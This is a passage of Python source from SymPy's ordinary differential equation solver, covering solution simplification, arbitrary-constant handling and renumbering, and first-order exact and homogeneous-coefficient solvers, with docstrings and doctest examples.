y = func[1].func
z = func[2].func
fc = func_coef
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
u, v, w = symbols('u, v, w', cls=Dummy)
a = Wild('a', exclude=[x(t), y(t), z(t), t])
b = Wild('b', exclude=[x(t), y(t), z(t), t])
c = Wild('c', exclude=[x(t), y(t), z(t), t])
f = Wild('f')
F1 = Wild('F1')
F2 = Wild('F2')
F3 = Wild('F3')
for i in range(3):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
r1 = eq[0].match(diff(x(t),t) - a*y(t)*z(t))
r2 = eq[1].match(diff(y(t),t) - b*z(t)*x(t))
r3 = eq[2].match(diff(z(t),t) - c*x(t)*y(t))
if r1 and r2 and r3:
num1, den1 = r1[a].as_numer_denom()
num2, den2 = r2[b].as_numer_denom()
num3, den3 = r3[c].as_numer_denom()
if solve([num1*u-den1*(v-w), num2*v-den2*(w-u), num3*w-den3*(u-v)],[u, v]):
return 'type1'
r = eq[0].match(diff(x(t),t) - y(t)*z(t)*f)
if r:
r1 = collect_const(r[f]).match(a*f)
r2 = ((diff(y(t),t) - eq[1])/r1[f]).match(b*z(t)*x(t))
r3 = ((diff(z(t),t) - eq[2])/r1[f]).match(c*x(t)*y(t))
if r1 and r2 and r3:
num1, den1 = r1[a].as_numer_denom()
num2, den2 = r2[b].as_numer_denom()
num3, den3 = r3[c].as_numer_denom()
if solve([num1*u-den1*(v-w), num2*v-den2*(w-u), num3*w-den3*(u-v)],[u, v]):
return 'type2'
r = eq[0].match(diff(x(t),t) - (F2-F3))
if r:
r1 = collect_const(r[F2]).match(c*F2)
r1.update(collect_const(r[F3]).match(b*F3))
if r1:
if eq[1].has(r1[F2]) and not eq[1].has(r1[F3]):
r1[F2], r1[F3] = r1[F3], r1[F2]
r1[c], r1[b] = -r1[b], -r1[c]
r2 = eq[1].match(diff(y(t),t) - a*r1[F3] + r1[c]*F1)
if r2:
r3 = (eq[2] == diff(z(t),t) - r1[b]*r2[F1] + r2[a]*r1[F2])
if r1 and r2 and r3:
return 'type3'
r = eq[0].match(diff(x(t),t) - z(t)*F2 + y(t)*F3)
if r:
r1 = collect_const(r[F2]).match(c*F2)
r1.update(collect_const(r[F3]).match(b*F3))
if r1:
if eq[1].has(r1[F2]) and not eq[1].has(r1[F3]):
r1[F2], r1[F3] = r1[F3], r1[F2]
r1[c], r1[b] = -r1[b], -r1[c]
r2 = (diff(y(t),t) - eq[1]).match(a*x(t)*r1[F3] - r1[c]*z(t)*F1)
if r2:
r3 = (diff(z(t),t) - eq[2] == r1[b]*y(t)*r2[F1] - r2[a]*x(t)*r1[F2])
if r1 and r2 and r3:
return 'type4'
r = (diff(x(t),t) - eq[0]).match(x(t)*(F2 - F3))
if r:
r1 = collect_const(r[F2]).match(c*F2)
r1.update(collect_const(r[F3]).match(b*F3))
if r1:
if eq[1].has(r1[F2]) and not eq[1].has(r1[F3]):
r1[F2], r1[F3] = r1[F3], r1[F2]
r1[c], r1[b] = -r1[b], -r1[c]
r2 = (diff(y(t),t) - eq[1]).match(y(t)*(a*r1[F3] - r1[c]*F1))
if r2:
r3 = (diff(z(t),t) - eq[2] == z(t)*(r1[b]*r2[F1] - r2[a]*r1[F2]))
if r1 and r2 and r3:
return 'type5'
return None
def check_nonlinear_3eq_order2(eq, func, func_coef):
return None
@vectorize(0)
def odesimp(ode, eq, func, hint):
r"""
Simplifies solutions of ODEs, including trying to solve for ``func`` and
running :py:meth:`~sympy.solvers.ode.constantsimp`.
It may use knowledge of the type of solution that the hint returns to
apply additional simplifications.
It also attempts to integrate any :py:class:`~sympy.integrals.integrals.Integral`\s
in the expression, if the hint is not an ``_Integral`` hint.
This function should have no effect on expressions returned by
:py:meth:`~sympy.solvers.ode.dsolve`, as
:py:meth:`~sympy.solvers.ode.dsolve` already calls
:py:meth:`~sympy.solvers.ode.ode.odesimp`, but the individual hint functions
do not call :py:meth:`~sympy.solvers.ode.ode.odesimp` (because the
:py:meth:`~sympy.solvers.ode.dsolve` wrapper does). Therefore, this
function is designed for mainly internal use.
Examples
========
>>> from sympy import sin, symbols, dsolve, pprint, Function
>>> from sympy.solvers.ode.ode import odesimp
>>> x , u2, C1= symbols('x,u2,C1')
>>> f = Function('f')
>>> eq = dsolve(x*f(x).diff(x) - f(x) - x*sin(f(x)/x), f(x),
... hint='1st_homogeneous_coeff_subs_indep_div_dep_Integral',
... simplify=False)
>>> pprint(eq, wrap_line=False)
x
----
f(x)
/
|
| / 1 \
| -|u2 + -------|
| | /1 \|
| | sin|--||
| \ \u2//
log(f(x)) = log(C1) + | ---------------- d(u2)
| 2
| u2
|
/
>>> pprint(odesimp(eq, f(x), 1, {C1},
... hint='1st_homogeneous_coeff_subs_indep_div_dep'
... )) #doctest: +SKIP
x
--------- = C1
/f(x)\
tan|----|
\2*x /
"""
x = func.args[0]
f = func.func
C1 = get_numbered_constants(eq, num=1)
constants = eq.free_symbols - ode.free_symbols
# First, integrate if the hint allows it.
eq = _handle_Integral(eq, func, hint)
if hint.startswith("nth_linear_euler_eq_nonhomogeneous"):
eq = simplify(eq)
if not isinstance(eq, Equality):
raise TypeError("eq should be an instance of Equality")
# Second, clean up the arbitrary constants.
# Right now, nth linear hints can put as many as 2*order constants in an
# expression. If that number grows with another hint, the third argument
# here should be raised accordingly, or constantsimp() rewritten to handle
# an arbitrary number of constants.
eq = constantsimp(eq, constants)
# Lastly, now that we have cleaned up the expression, try solving for func.
# When CRootOf is implemented in solve(), we will want to return a CRootOf
# every time instead of an Equality.
# Get the f(x) on the left if possible.
if eq.rhs == func and not eq.lhs.has(func):
eq = [Eq(eq.rhs, eq.lhs)]
# make sure we are working with lists of solutions in simplified form.
if eq.lhs == func and not eq.rhs.has(func):
# The solution is already solved
eq = [eq]
# special simplification of the rhs
if hint.startswith("nth_linear_constant_coeff"):
# Collect terms to make the solution look nice.
# This is also necessary for constantsimp to remove unnecessary
# terms from the particular solution from variation of parameters
#
# Collect is not behaving reliably here. The results for
# some linear constant-coefficient equations with repeated
# roots do not properly simplify all constants sometimes.
# 'collectterms' gives different orders sometimes, and results
# differ in collect based on that order. The
# sort-reverse trick fixes things, but may fail in the
# future. In addition, collect is splitting exponentials with
# rational powers for no reason. We have to do a match
# to fix this using Wilds.
#
# XXX: This global collectterms hack should be removed.
global collectterms
collectterms.sort(key=default_sort_key)
collectterms.reverse()
assert len(eq) == 1 and eq[0].lhs == f(x)
sol = eq[0].rhs
sol = expand_mul(sol)
for i, reroot, imroot in collectterms:
sol = collect(sol, x**i*exp(reroot*x)*sin(abs(imroot)*x))
sol = collect(sol, x**i*exp(reroot*x)*cos(imroot*x))
for i, reroot, imroot in collectterms:
sol = collect(sol, x**i*exp(reroot*x))
del collectterms
# Collect is splitting exponentials with rational powers for
# no reason. We call powsimp to fix.
sol = powsimp(sol)
eq[0] = Eq(f(x), sol)
else:
# The solution is not solved, so try to solve it
try:
floats = any(i.is_Float for i in eq.atoms(Number))
eqsol = solve(eq, func, force=True, rational=False if floats else None)
if not eqsol:
raise NotImplementedError
except (NotImplementedError, PolynomialError):
eq = [eq]
else:
def _expand(expr):
numer, denom = expr.as_numer_denom()
if denom.is_Add:
return expr
else:
return powsimp(expr.expand(), combine='exp', deep=True)
# XXX: the rest of odesimp() expects each ``t`` to be in a
# specific normal form: rational expression with numerator
# expanded, but with combined exponential functions (at
# least in this setup all tests pass).
eq = [Eq(f(x), _expand(t)) for t in eqsol]
# special simplification of the lhs.
if hint.startswith("1st_homogeneous_coeff"):
for j, eqi in enumerate(eq):
newi = logcombine(eqi, force=True)
if isinstance(newi.lhs, log) and newi.rhs == 0:
newi = Eq(newi.lhs.args[0]/C1, C1)
eq[j] = newi
# We cleaned up the constants before solving to help the solve engine with
# a simpler expression, but the solved expression could have introduced
# things like -C1, so rerun constantsimp() one last time before returning.
for i, eqi in enumerate(eq):
eq[i] = constantsimp(eqi, constants)
eq[i] = constant_renumber(eq[i], ode.free_symbols)
# If there is only 1 solution, return it;
# otherwise return the list of solutions.
if len(eq) == 1:
eq = eq[0]
return eq
def ode_sol_simplicity(sol, func, trysolving=True):
r"""
Returns an extended integer representing how simple a solution to an ODE
is.
The following things are considered, in order from most simple to least:
- ``sol`` is solved for ``func``.
- ``sol`` is not solved for ``func``, but can be if passed to solve (e.g.,
a solution returned by ``dsolve(ode, func, simplify=False``).
- If ``sol`` is not solved for ``func``, then base the result on the
length of ``sol``, as computed by ``len(str(sol))``.
- If ``sol`` has any unevaluated :py:class:`~sympy.integrals.integrals.Integral`\s,
this will automatically be considered less simple than any of the above.
This function returns an integer such that if solution A is simpler than
solution B by above metric, then ``ode_sol_simplicity(sola, func) <
ode_sol_simplicity(solb, func)``.
Currently, the following are the numbers returned, but if the heuristic is
ever improved, this may change. Only the ordering is guaranteed.
+----------------------------------------------+-------------------+
| Simplicity | Return |
+==============================================+===================+
| ``sol`` solved for ``func`` | ``-2`` |
+----------------------------------------------+-------------------+
| ``sol`` not solved for ``func`` but can be | ``-1`` |
+----------------------------------------------+-------------------+
| ``sol`` is not solved nor solvable for | ``len(str(sol))`` |
| ``func`` | |
+----------------------------------------------+-------------------+
| ``sol`` contains an | ``oo`` |
| :obj:`~sympy.integrals.integrals.Integral` | |
+----------------------------------------------+-------------------+
``oo`` here means the SymPy infinity, which should compare greater than
any integer.
If you already know :py:meth:`~sympy.solvers.solvers.solve` cannot solve
``sol``, you can use ``trysolving=False`` to skip that step, which is the
only potentially slow step. For example,
:py:meth:`~sympy.solvers.ode.dsolve` with the ``simplify=False`` flag
should do this.
If ``sol`` is a list of solutions, if the worst solution in the list
returns ``oo`` it returns that, otherwise it returns ``len(str(sol))``,
that is, the length of the string representation of the whole list.
Examples
========
This function is designed to be passed to ``min`` as the key argument,
such as ``min(listofsolutions, key=lambda i: ode_sol_simplicity(i,
f(x)))``.
>>> from sympy import symbols, Function, Eq, tan, Integral
>>> from sympy.solvers.ode.ode import ode_sol_simplicity
>>> x, C1, C2 = symbols('x, C1, C2')
>>> f = Function('f')
>>> ode_sol_simplicity(Eq(f(x), C1*x**2), f(x))
-2
>>> ode_sol_simplicity(Eq(x**2 + f(x), C1), f(x))
-1
>>> ode_sol_simplicity(Eq(f(x), C1*Integral(2*x, x)), f(x))
oo
>>> eq1 = Eq(f(x)/tan(f(x)/(2*x)), C1)
>>> eq2 = Eq(f(x)/tan(f(x)/(2*x) + f(x)), C2)
>>> [ode_sol_simplicity(eq, f(x)) for eq in [eq1, eq2]]
[28, 35]
>>> min([eq1, eq2], key=lambda i: ode_sol_simplicity(i, f(x)))
Eq(f(x)/tan(f(x)/(2*x)), C1)
"""
# TODO: if two solutions are solved for f(x), we still want to be
# able to get the simpler of the two
# See the docstring for the coercion rules. We check easier (faster)
# things here first, to save time.
if iterable(sol):
# See if there are Integrals
for i in sol:
if ode_sol_simplicity(i, func, trysolving=trysolving) == oo:
return oo
return len(str(sol))
if sol.has(Integral):
return oo
# Next, try to solve for func. This code will change slightly when CRootOf
# is implemented in solve(). Probably a CRootOf solution should fall
# somewhere between a normal solution and an unsolvable expression.
# First, see if they are already solved
if sol.lhs == func and not sol.rhs.has(func) or \
sol.rhs == func and not sol.lhs.has(func):
return -2
# We are not so lucky, try solving manually
if trysolving:
try:
sols = solve(sol, func)
if not sols:
raise NotImplementedError
except NotImplementedError:
pass
else:
return -1
# Finally, a naive computation based on the length of the string version
# of the expression. This may favor combined fractions because they
# will not have duplicate denominators, and may slightly favor expressions
# with fewer additions and subtractions, as those are separated by spaces
# by the printer.
# Additional ideas for simplicity heuristics are welcome, like maybe
# checking if a equation has a larger domain, or if constantsimp has
# introduced arbitrary constants numbered higher than the order of a
# given ODE that sol is a solution of.
return len(str(sol))
def _extract_funcs(eqs):
from sympy.core.basic import preorder_traversal
funcs = []
for eq in eqs:
derivs = [node for node in preorder_traversal(eq) if isinstance(node, Derivative)]
func = []
for d in derivs:
func += list(d.atoms(AppliedUndef))
for func_ in func:
funcs.append(func_)
funcs = list(uniq(funcs))
return funcs
def _get_constant_subexpressions(expr, Cs):
Cs = set(Cs)
Ces = []
def _recursive_walk(expr):
expr_syms = expr.free_symbols
if expr_syms and expr_syms.issubset(Cs):
Ces.append(expr)
else:
if expr.func == exp:
expr = expr.expand(mul=True)
if expr.func in (Add, Mul):
d = sift(expr.args, lambda i : i.free_symbols.issubset(Cs))
if len(d[True]) > 1:
x = expr.func(*d[True])
if not x.is_number:
Ces.append(x)
elif isinstance(expr, Integral):
if expr.free_symbols.issubset(Cs) and \
all(len(x) == 3 for x in expr.limits):
Ces.append(expr)
for i in expr.args:
_recursive_walk(i)
return
_recursive_walk(expr)
return Ces
def __remove_linear_redundancies(expr, Cs):
cnts = {i: expr.count(i) for i in Cs}
Cs = [i for i in Cs if cnts[i] > 0]
def _linear(expr):
if isinstance(expr, Add):
xs = [i for i in Cs if expr.count(i)==cnts[i] \
and 0 == expr.diff(i, 2)]
d = {}
for x in xs:
y = expr.diff(x)
if y not in d:
d[y]=[]
d[y].append(x)
for y in d:
if len(d[y]) > 1:
d[y].sort(key=str)
for x in d[y][1:]:
expr = expr.subs(x, 0)
return expr
def _recursive_walk(expr):
if len(expr.args) != 0:
expr = expr.func(*[_recursive_walk(i) for i in expr.args])
expr = _linear(expr)
return expr
if isinstance(expr, Equality):
lhs, rhs = [_recursive_walk(i) for i in expr.args]
f = lambda i: isinstance(i, Number) or i in Cs
if isinstance(lhs, Symbol) and lhs in Cs:
rhs, lhs = lhs, rhs
if lhs.func in (Add, Symbol) and rhs.func in (Add, Symbol):
dlhs = sift([lhs] if isinstance(lhs, AtomicExpr) else lhs.args, f)
drhs = sift([rhs] if isinstance(rhs, AtomicExpr) else rhs.args, f)
for i in [True, False]:
for hs in [dlhs, drhs]:
if i not in hs:
hs[i] = [0]
# this calculation can be simplified
lhs = Add(*dlhs[False]) - Add(*drhs[False])
rhs = Add(*drhs[True]) - Add(*dlhs[True])
elif lhs.func in (Mul, Symbol) and rhs.func in (Mul, Symbol):
dlhs = sift([lhs] if isinstance(lhs, AtomicExpr) else lhs.args, f)
if True in dlhs:
if False not in dlhs:
dlhs[False] = [1]
lhs = Mul(*dlhs[False])
rhs = rhs/Mul(*dlhs[True])
return Eq(lhs, rhs)
else:
return _recursive_walk(expr)
@vectorize(0)
def constantsimp(expr, constants):
r"""
Simplifies an expression with arbitrary constants in it.
This function is written specifically to work with
:py:meth:`~sympy.solvers.ode.dsolve`, and is not intended for general use.
Simplification is done by "absorbing" the arbitrary constants into other
arbitrary constants, numbers, and symbols that they are not independent
of.
The symbols must all have the same name with numbers after it, for
example, ``C1``, ``C2``, ``C3``. The ``symbolname`` here would be
'``C``', the ``startnumber`` would be 1, and the ``endnumber`` would be 3.
If the arbitrary constants are independent of the variable ``x``, then the
independent symbol would be ``x``. There is no need to specify the
dependent function, such as ``f(x)``, because it already has the
independent symbol, ``x``, in it.
Because terms are "absorbed" into arbitrary constants and because
constants are renumbered after simplifying, the arbitrary constants in
expr are not necessarily equal to the ones of the same name in the
returned result.
If two or more arbitrary constants are added, multiplied, or raised to the
power of each other, they are first absorbed together into a single
arbitrary constant. Then the new constant is combined into other terms if
necessary.
Absorption of constants is done with limited assistance:
1. terms of :py:class:`~sympy.core.add.Add`\s are collected to try join
constants so `e^x (C_1 \cos(x) + C_2 \cos(x))` will simplify to `e^x
C_1 \cos(x)`;
2. powers with exponents that are :py:class:`~sympy.core.add.Add`\s are
expanded so `e^{C_1 + x}` will be simplified to `C_1 e^x`.
Use :py:meth:`~sympy.solvers.ode.ode.constant_renumber` to renumber constants
after simplification or else arbitrary numbers on constants may appear,
e.g. `C_1 + C_3 x`.
In rare cases, a single constant can be "simplified" into two constants.
Every differential equation solution should have as many arbitrary
constants as the order of the differential equation. The result here will
be technically correct, but it may, for example, have `C_1` and `C_2` in
an expression, when `C_1` is actually equal to `C_2`. Use your discretion
in such situations, and also take advantage of the ability to use hints in
:py:meth:`~sympy.solvers.ode.dsolve`.
Examples
========
>>> from sympy import symbols
>>> from sympy.solvers.ode.ode import constantsimp
>>> C1, C2, C3, x, y = symbols('C1, C2, C3, x, y')
>>> constantsimp(2*C1*x, {C1, C2, C3})
C1*x
>>> constantsimp(C1 + 2 + x, {C1, C2, C3})
C1 + x
>>> constantsimp(C1*C2 + 2 + C2 + C3*x, {C1, C2, C3})
C1 + C3*x
"""
# This function works recursively. The idea is that, for Mul,
# Add, Pow, and Function, if the class has a constant in it, then
# we can simplify it, which we do by recursing down and
# simplifying up. Otherwise, we can skip that part of the
# expression.
Cs = constants
orig_expr = expr
constant_subexprs = _get_constant_subexpressions(expr, Cs)
for xe in constant_subexprs:
xes = list(xe.free_symbols)
if not xes:
continue
if all([expr.count(c) == xe.count(c) for c in xes]):
xes.sort(key=str)
expr = expr.subs(xe, xes[0])
# try to perform common sub-expression elimination of constant terms
try:
commons, rexpr = cse(expr)
commons.reverse()
rexpr = rexpr[0]
for s in commons:
cs = list(s[1].atoms(Symbol))
if len(cs) == 1 and cs[0] in Cs and \
cs[0] not in rexpr.atoms(Symbol) and \
not any(cs[0] in ex for ex in commons if ex != s):
rexpr = rexpr.subs(s[0], cs[0])
else:
rexpr = rexpr.subs(*s)
expr = rexpr
except IndexError:
pass
expr = __remove_linear_redundancies(expr, Cs)
def _conditional_term_factoring(expr):
new_expr = terms_gcd(expr, clear=False, deep=True, expand=False)
# we do not want to factor exponentials, so handle this separately
if new_expr.is_Mul:
infac = False
asfac = False
for m in new_expr.args:
if isinstance(m, exp):
asfac = True
elif m.is_Add:
infac = any(isinstance(fi, exp) for t in m.args
for fi in Mul.make_args(t))
if asfac and infac:
new_expr = expr
break
return new_expr
expr = _conditional_term_factoring(expr)
# call recursively if more simplification is possible
if orig_expr != expr:
return constantsimp(expr, Cs)
return expr
def constant_renumber(expr, variables=None, newconstants=None):
r"""
Renumber arbitrary constants in ``expr`` to use the symbol names as given
in ``newconstants``. In the process, this reorders expression terms in a
standard way.
If ``newconstants`` is not provided then the new constant names will be
``C1``, ``C2`` etc. Otherwise ``newconstants`` should be an iterable
giving the new symbols to use for the constants in order.
The ``variables`` argument is a list of non-constant symbols. All other
free symbols found in ``expr`` are assumed to be constants and will be
renumbered. If ``variables`` is not given then any numbered symbol
beginning with ``C`` (e.g. ``C1``) is assumed to be a constant.
Symbols are renumbered based on ``.sort_key()``, so they should be
numbered roughly in the order that they appear in the final, printed
expression. Note that this ordering is based in part on hashes, so it can
produce different results on different machines.
The structure of this function is very similar to that of
:py:meth:`~sympy.solvers.ode.constantsimp`.
Examples
========
>>> from sympy import symbols
>>> from sympy.solvers.ode.ode import constant_renumber
>>> x, C1, C2, C3 = symbols('x,C1:4')
>>> expr = C3 + C2*x + C1*x**2
>>> expr
C1*x**2 + C2*x + C3
>>> constant_renumber(expr)
C1 + C2*x + C3*x**2
The ``variables`` argument specifies which are constants so that the
other symbols will not be renumbered:
>>> constant_renumber(expr, [C1, x])
C1*x**2 + C2 + C3*x
The ``newconstants`` argument is used to specify what symbols to use when
replacing the constants:
>>> constant_renumber(expr, [x], newconstants=symbols('E1:4'))
E1 + E2*x + E3*x**2
"""
# System of expressions
if isinstance(expr, (set, list, tuple)):
return type(expr)(constant_renumber(Tuple(*expr),
variables=variables, newconstants=newconstants))
# Symbols in solution but not ODE are constants
if variables is not None:
variables = set(variables)
free_symbols = expr.free_symbols
constantsymbols = list(free_symbols - variables)
# Any Cn is a constant...
else:
variables = set()
isconstant = lambda s: s.startswith('C') and s[1:].isdigit()
constantsymbols = [sym for sym in expr.free_symbols if isconstant(sym.name)]
# Find new constants checking that they aren't already in the ODE
if newconstants is None:
iter_constants = numbered_symbols(start=1, prefix='C', exclude=variables)
else:
iter_constants = (sym for sym in newconstants if sym not in variables)
constants_found = []
# make a mapping to send all constantsymbols to S.One and use
# that to make sure that term ordering is not dependent on
# the indexed value of C
C_1 = [(ci, S.One) for ci in constantsymbols]
sort_key=lambda arg: default_sort_key(arg.subs(C_1))
def _constant_renumber(expr):
r"""
We need to have an internal recursive function
"""
# For system of expressions
if isinstance(expr, Tuple):
renumbered = [_constant_renumber(e) for e in expr]
return Tuple(*renumbered)
if isinstance(expr, Equality):
return Eq(
_constant_renumber(expr.lhs),
_constant_renumber(expr.rhs))
if type(expr) not in (Mul, Add, Pow) and not expr.is_Function and \
not expr.has(*constantsymbols):
# Base case, as above. Hope there aren't constants inside
# of some other class, because they won't be renumbered.
return expr
elif expr.is_Piecewise:
return expr
elif expr in constantsymbols:
if expr not in constants_found:
constants_found.append(expr)
return expr
elif expr.is_Function or expr.is_Pow:
return expr.func(
*[_constant_renumber(x) for x in expr.args])
else:
sortedargs = list(expr.args)
sortedargs.sort(key=sort_key)
return expr.func(*[_constant_renumber(x) for x in sortedargs])
expr = _constant_renumber(expr)
# Don't renumber symbols present in the ODE.
constants_found = [c for c in constants_found if c not in variables]
# Renumbering happens here
subs_dict = {var: cons for var, cons in zip(constants_found, iter_constants)}
expr = expr.subs(subs_dict, simultaneous=True)
return expr
def _handle_Integral(expr, func, hint):
r"""
Converts a solution with Integrals in it into an actual solution.
For most hints, this simply runs ``expr.doit()``.
"""
# XXX: This global y hack should be removed
global y
x = func.args[0]
f = func.func
if hint == "1st_exact":
sol = (expr.doit()).subs(y, f(x))
del y
elif hint == "1st_exact_Integral":
sol = Eq(Subs(expr.lhs, y, f(x)), expr.rhs)
del y
elif hint == "nth_linear_constant_coeff_homogeneous":
sol = expr
elif not hint.endswith("_Integral"):
sol = expr.doit()
else:
sol = expr
return sol
# FIXME: replace the general solution in the docstring with
# dsolve(equation, hint='1st_exact_Integral'). You will need to be able
# to have assumptions on P and Q that dP/dy = dQ/dx.
def ode_1st_exact(eq, func, order, match):
r"""
Solves 1st order exact ordinary differential equations.
A 1st order differential equation is called exact if it is the total
differential of a function. That is, the differential equation
.. math:: P(x, y) \,\partial{}x + Q(x, y) \,\partial{}y = 0
is exact if there is some function `F(x, y)` such that `P(x, y) =
\partial{}F/\partial{}x` and `Q(x, y) = \partial{}F/\partial{}y`. It can
be shown that a necessary and sufficient condition for a first order ODE
to be exact is that `\partial{}P/\partial{}y = \partial{}Q/\partial{}x`.
Then, the solution will be as given below::
>>> from sympy import Function, Eq, Integral, symbols, pprint
>>> x, y, t, x0, y0, C1= symbols('x,y,t,x0,y0,C1')
>>> P, Q, F= map(Function, ['P', 'Q', 'F'])
>>> pprint(Eq(Eq(F(x, y), Integral(P(t, y), (t, x0, x)) +
... Integral(Q(x0, t), (t, y0, y))), C1))
x y
/ /
| |
F(x, y) = | P(t, y) dt + | Q(x0, t) dt = C1
| |
/ /
x0 y0
Where the first partials of `P` and `Q` exist and are continuous in a
simply connected region.
A note: SymPy currently has no way to represent inert substitution on an
expression, so the hint ``1st_exact_Integral`` will return an integral
with `dy`. This is supposed to represent the function that you are
solving for.
Examples
========
>>> from sympy import Function, dsolve, cos, sin
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(cos(f(x)) - (x*sin(f(x)) - f(x)**2)*f(x).diff(x),
... f(x), hint='1st_exact')
Eq(x*cos(f(x)) + f(x)**3/3, C1)
References
==========
- https://en.wikipedia.org/wiki/Exact_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 73
# indirect doctest
"""
x = func.args[0]
r = match # d+e*diff(f(x),x)
e = r[r['e']]
d = r[r['d']]
# XXX: This global y hack should be removed
global y # This is the only way to pass dummy y to _handle_Integral
y = r['y']
C1 = get_numbered_constants(eq, num=1)
# Refer Joel Moses, "Symbolic Integration - The Stormy Decade",
# Communications of the ACM, Volume 14, Number 8, August 1971, pp. 558
# which gives the method to solve an exact differential equation.
sol = Integral(d, x) + Integral((e - (Integral(d, x).diff(y))), y)
return Eq(sol, C1)
def ode_1st_homogeneous_coeff_best(eq, func, order, match):
r"""
Returns the best solution to an ODE from the two hints
``1st_homogeneous_coeff_subs_dep_div_indep`` and
``1st_homogeneous_coeff_subs_indep_div_dep``.
This is as determined by :py:meth:`~sympy.solvers.ode.ode.ode_sol_simplicity`.
See the
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`
and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep`
docstrings for more information on these hints. Note that there is no
``ode_1st_homogeneous_coeff_best_Integral`` hint.
Examples
========
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(2*x*f(x) + (x**2 + f(x)**2)*f(x).diff(x), f(x),
... hint='1st_homogeneous_coeff_best', simplify=False))
/ 2 \
| 3*x |
log|----- + 1|
| 2 |
\f (x) /
log(f(x)) = log(C1) - --------------
3
References
==========
- https://en.wikipedia.org/wiki/Homogeneous_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 59
# indirect doctest
"""
# There are two substitutions that solve the equation, u1=y/x and u2=x/y
# They produce different integrals, so try them both and see which
# one is easier.
sol1 = ode_1st_homogeneous_coeff_subs_indep_div_dep(eq,
func, order, match)
sol2 = ode_1st_homogeneous_coeff_subs_dep_div_indep(eq,
func, order, match)
simplify = match.get('simplify', True)
if simplify:
# why is odesimp called here? Should it be at the usual spot?
sol1 = odesimp(eq, sol1, func, "1st_homogeneous_coeff_subs_indep_div_dep")
sol2 = odesimp(eq, sol2, func, "1st_homogeneous_coeff_subs_dep_div_indep")
return min([sol1, sol2], key=lambda x: ode_sol_simplicity(x, func,
trysolving=not simplify))
def ode_1st_homogeneous_coeff_subs_dep_div_indep(eq, func, order, match):
r"""
Solves a 1st order differential equation with homogeneous coefficients
using the substitution `u_1 = \frac{\text{<dependent
variable>}}{\text{<independent variable>}}`.
This is a differential equation
.. math:: P(x, y) + Q(x, y) dy/dx = 0
such that `P` and `Q` are homogeneous and of the same order. A function
`F(x, y)` is homogeneous of order `n` if `F(x t, y t) = t^n F(x, y)`.
Equivalently, `F(x, y)` can be rewritten as `G(y/x)` or `H(x/y)`. See
also the docstring of :py:meth:`~sympy.solvers.ode.homogeneous_order`.
If the coefficients `P` and `Q` in the differential equation above are
homogeneous functions of the same order, then it can be shown that the
substitution `y = u_1 x` (i.e. `u_1 = y/x`) will turn the differential
equation into an equation separable in the variables `x` and `u`. If
`h(u_1)` is the function that results from making the substitution `u_1 =
f(x)/x` on `P(x, f(x))` and `g(u_2)` is the function that results from the
substitution on `Q(x, f(x))` in the differential equation `P(x, f(x)) +
Q(x, f(x)) f'(x) = 0`, then the general solution is::
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f, g, h = map(Function, ['f', 'g', 'h'])
>>> genform = g(f(x)/x) + h(f(x)/x)*f(x).diff(x)
>>> pprint(genform)
/f(x)\ /f(x)\ d
g|----| + h|----|*--(f(x))
\ x / \ x / dx
>>> pprint(dsolve(genform, f(x),
... hint='1st_homogeneous_coeff_subs_dep_div_indep_Integral'))
f(x)
----
x
/
|
| -h(u1)
log(x) = C1 + | ---------------- d(u1)
| u1*h(u1) + g(u1)
|
/
Where `u_1 h(u_1) + g(u_1) \ne 0` and `x \ne 0`.
See also the docstrings of
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best` and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`.
Examples
========
>>> from sympy import Function, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(2*x*f(x) + (x**2 + f(x)**2)*f(x).diff(x), f(x),
... hint='1st_homogeneous_coeff_subs_dep_div_indep', simplify=False))
/ 3 \
|3*f(x) f (x)|
log|------ + -----|
| x 3 |
\ x /
log(x) = log(C1) - -------------------
3
References
==========
- https://en.wikipedia.org/wiki/Homogeneous_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 59
# indirect doctest
"""
x = func.args[0]
f = func.func
u = Dummy('u')
u1 = Dummy('u1') # u1 == f(x)/x
r = match # d+e*diff(f(x),x)
C1 = get_numbered_constants(eq, num=1)
xarg = match.get('xarg', 0)
yarg = match.get('yarg', 0)
int = Integral(
(-r[r['e']]/(r[r['d']] + u1*r[r['e']])).subs({x: 1, r['y']: u1}),
(u1, None, f(x)/x))
sol = logcombine(Eq(log(x), int + log(C1)), force=True)
sol = sol.subs(f(x), u).subs(((u, u - yarg), (x, x - xarg), (u, f(x))))
return sol
def ode_1st_homogeneous_coeff_subs_indep_div_dep(eq, func, order, match):
r"""
Solves a 1st order differential equation with homogeneous coefficients
using the substitution `u_2 = \frac{\text{<independent
variable>}}{\text{<dependent variable>}}`.
This is a differential equation
.. math:: P(x, y) + Q(x, y) dy/dx = 0
such that `P` and `Q` are homogeneous and of the same order. A function
`F(x, y)` is homogeneous of order `n` if `F(x t, y t) = t^n F(x, y)`.
Equivalently, `F(x, y)` can be rewritten as `G(y/x)` or `H(x/y)`. See
also the docstring of :py:meth:`~sympy.solvers.ode.homogeneous_order`.
If the coefficients `P` and `Q` in the differential equation above are
homogeneous functions of the same order, then it can be shown that the
substitution `x = u_2 y` (i.e. `u_2 = x/y`) will turn the differential
equation into an equation separable in the variables `y` and `u_2`. If
`h(u_2)` is the function that results from making the substitution `u_2 =
x/f(x)` on `P(x, f(x))` and `g(u_2)` is the function that results from the
substitution on `Q(x, f(x))` in the differential equation `P(x, f(x)) +
Q(x, f(x)) f'(x) = 0`, then the general solution is:
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f, g, h = map(Function, ['f', 'g', 'h'])
>>> genform = g(x/f(x)) + h(x/f(x))*f(x).diff(x)
>>> pprint(genform)
